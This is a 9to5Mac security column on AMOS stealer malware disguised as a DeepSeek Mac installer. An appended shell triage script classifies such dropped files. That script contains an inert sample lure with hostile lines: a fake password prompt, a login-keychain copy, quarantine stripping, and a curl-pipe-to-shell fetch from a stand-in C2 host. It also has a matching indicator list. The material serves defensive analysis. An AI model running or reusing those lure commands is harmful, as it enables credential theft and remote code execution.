Security Bite: Top macOS threat found riding the DeepSeek wave
9to5mac.com
Tired of hearing about DeepSeek yet? The China-based LLM chatbot beached itself onto the scene this week, dominating the tech news cycle and even taking #1 on the App Store, where it still sits as of writing. However, its rapid popularity has led to a wave of new phishing campaigns, investment scams, and macOS malware disguised as real DeepSeek applications. Here's the latest.

You're reading 9to5Mac Security Bite, where each week I share insights on data privacy, discuss the latest vulnerabilities, and shed light on emerging threats within Apple's vast ecosystem of over 2 billion active devices.

Cyble, a cybersecurity firm, has kept tabs on several new scams cashing in on DeepSeek's moment of fame. These include crypto scams in which criminals try to trick victims into scanning QR codes that compromise their wallets, as well as fake investment opportunities.
I've also seen several legitimate-looking DeepSeek Mac installers with convincing file names, but there's one problem: DeepSeek doesn't offer a Mac app.

In addition to phishing and fake investment campaigns, cybercriminals are now distributing AMOS (Atomic Stealer), one of the most prolific families of macOS stealer malware, inside DMG disk images posing as a DeepSeek Mac application. Unlike many other stealers, AMOS is written in Apple's Swift language and runs on both Intel and Apple Silicon Macs. That, together with its distribution model, is what makes AMOS so successful: the authors rent it out as a subscription service for $1,000 per month.

Fortunately, researchers have done extensive dynamic and code-level analysis of how it works. Once a Mac is infected, the malware runs scripts that connect back to the attackers' command-and-control (C2) server. That channel gives the operators two-way communication with the victim's Mac: they use it to issue commands and, more critically, to receive the stolen data. The haul typically includes iCloud Keychain passwords, credit card details, sensitive files, and browser-stored crypto wallet keys.

With the release of macOS Sequoia, Apple took a proactive step to make it harder for ordinary users to run malware by accident. On Sequoia, Control-clicking an app no longer offers an "Open" override for software that isn't signed and notarized; the user has to go to System Settings > Privacy & Security and explicitly allow it.
However, as I reported last year, attackers got around this by instructing users to drop the malicious code directly into the Terminal app. That same technique is being used here with the fake DeepSeek apps.

Here's how the attack works:

1. The victim downloads the malicious disk image (DMG) from a website, an email, or a similar lure and mounts it.
2. Instead of Control-clicking to install, the instructions tell the victim to open Terminal and drag the file inside the DMG into the Terminal window. Dropping a file into Terminal pastes its path onto the command line, and pressing Return executes it.
3. The seemingly harmless DeepSeek.file is, in fact, a malicious Bash script. Once it is run from Terminal, the stealer is off and running, and the victim is in for a bad day.

(via @MarceloRivero)

DeepSeek only offers iOS and Android apps. Any "installer" that asks you to drop a file into Terminal is malicious.

Further, as friendly advice, don't download or engage with DeepSeek at all. The LLM chatbot is operated from China and therefore has to adhere to Chinese law, which includes heavy censorship and broad government access to user data. It's a serious risk to your privacy and could fuel cyber-espionage campaigns against you in the future.

I am curious to hear your thoughts. Are you worried about DeepSeek's privacy concerns?

Follow Arin on LinkedIn, Threads, BlueSky, and X.

More in Apple security

- DeepSeek privacy concerns have led to investigations being opened in both the US and Europe, and the app has been removed from the App Store in Italy. The same seems likely to happen in other countries.
- Security researchers have discovered two flaws, known as SLAP and FLOP, present in all current iPhones, iPads, and Macs as well as many earlier ones. The vulnerabilities could potentially allow an attacker to see the current contents of your open web tabs.
- A judge has limited the FBI's power to trawl through data obtained from tech giants like Apple and Google, and from ISPs, under FISA (the Foreign Intelligence Surveillance Act).
- How hackers are still using Google Ads to spread malware. How, in 2025, can Google, with its DeepMind and deeper pockets, still allow this to happen?
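A quick triage check for the file such an installer asks you to drag into Terminal, added here as a worked example: this is the editor's own shell script, not code from 9to5Mac, Cyble, @MarceloRivero or the AMOS operators. It assumes what the post describes, namely that the dropped item is a Bash script rather than a real app. The function names, the indicator strings, and the sample "DeepSeek.file" lure are all this example's own assumptions; the lure is constructed and inert. The script is plain POSIX shell, so a responder can run it over a copy of the DMG contents from Linux as well as from a Mac.

```shell
#!/bin/sh
# Added triage helper (editor's example, not from the article or the malware):
# classify a file that a "DeepSeek installer" tells you to drag into Terminal.
# Dragging a file into Terminal pastes its path on the command line; Return runs it,
# so the only question that matters is what the file actually is.

# Classify by the first four bytes: "#!" means an interpreter script, the listed
# magics mean a Mach-O or fat (universal) binary, anything else is treated as data.
file_kind() {
    magic=$(od -A n -t x1 -N 4 "$1" | tr -d ' \n')
    case "$magic" in
        2321*) echo "script" ;;                                      # "#!"
        cafebabe|cffaedfe|cefaedfe|feedface|feedfacf) echo "macho" ;;
        *) echo "other" ;;
    esac
}

# Count loader behaviours commonly reported for macOS stealers (assumed indicator
# list): an osascript password prompt, base64-encoded stages, stripping the
# quarantine attribute, staging in /tmp, fetching a second stage with curl, touching
# the login keychain, and eval of generated code.
count_indicators() {
    n=0
    for pat in 'osascript' 'base64' 'xattr -d com.apple.quarantine' '/tmp/' 'curl ' 'login.keychain' 'eval '; do
        if grep -q -- "$pat" "$1"; then
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# Verdict for one file, printed as a single token so other scripts can consume it.
triage_dropped_file() {
    if [ ! -f "$1" ]; then
        echo "missing"
        return 1
    fi
    case "$(file_kind "$1")" in
        script)
            n=$(count_indicators "$1")
            if [ "$n" -ge 2 ]; then
                echo "malicious-script:$n"
            else
                echo "suspicious-script:$n"
            fi
            ;;
        macho)
            # A real Mac app ships as a bundle; a bare Mach-O handed to Terminal still
            # deserves a codesign/spctl check on a Mac before anything is run.
            echo "native-binary"
            ;;
        *)
            echo "not-executable"
            ;;
    esac
}

# Constructed sample lure. It is inert: the host is a reserved .invalid name, the
# script is never executed, and it exists only so the checks above have input.
write_constructed_lure() {
    cat > "$1" <<'EOF'
#!/bin/bash
osascript -e 'display dialog "DeepSeek needs your password to finish installing" default answer "" with hidden answer'
stage=$(echo 'aGVsbG8=' | base64 -d)
cp ~/Library/Keychains/login.keychain-db /tmp/.ds 2>/dev/null
xattr -d com.apple.quarantine /tmp/.ds 2>/dev/null
curl -s https://c2.example.invalid/stage2 | sh
EOF
}

work=$(mktemp -d)
LURE="$work/DeepSeek.file"
NOTES="$work/README.txt"
write_constructed_lure "$LURE"
printf 'DeepSeek for Mac does not exist; this is plain text.\n' > "$NOTES"

echo "$LURE: $(triage_dropped_file "$LURE")"     # malicious-script:6
echo "$NOTES: $(triage_dropped_file "$NOTES")"   # not-executable
```

On a Mac, a native-binary verdict should be followed by `codesign -dv` and `spctl --assess` on the file before it is run; the script deliberately stops at classification. In practice the classification is almost beside the point, which is the article's message: a legitimate installer never needs you to drag a file into Terminal, so that instruction alone is the verdict.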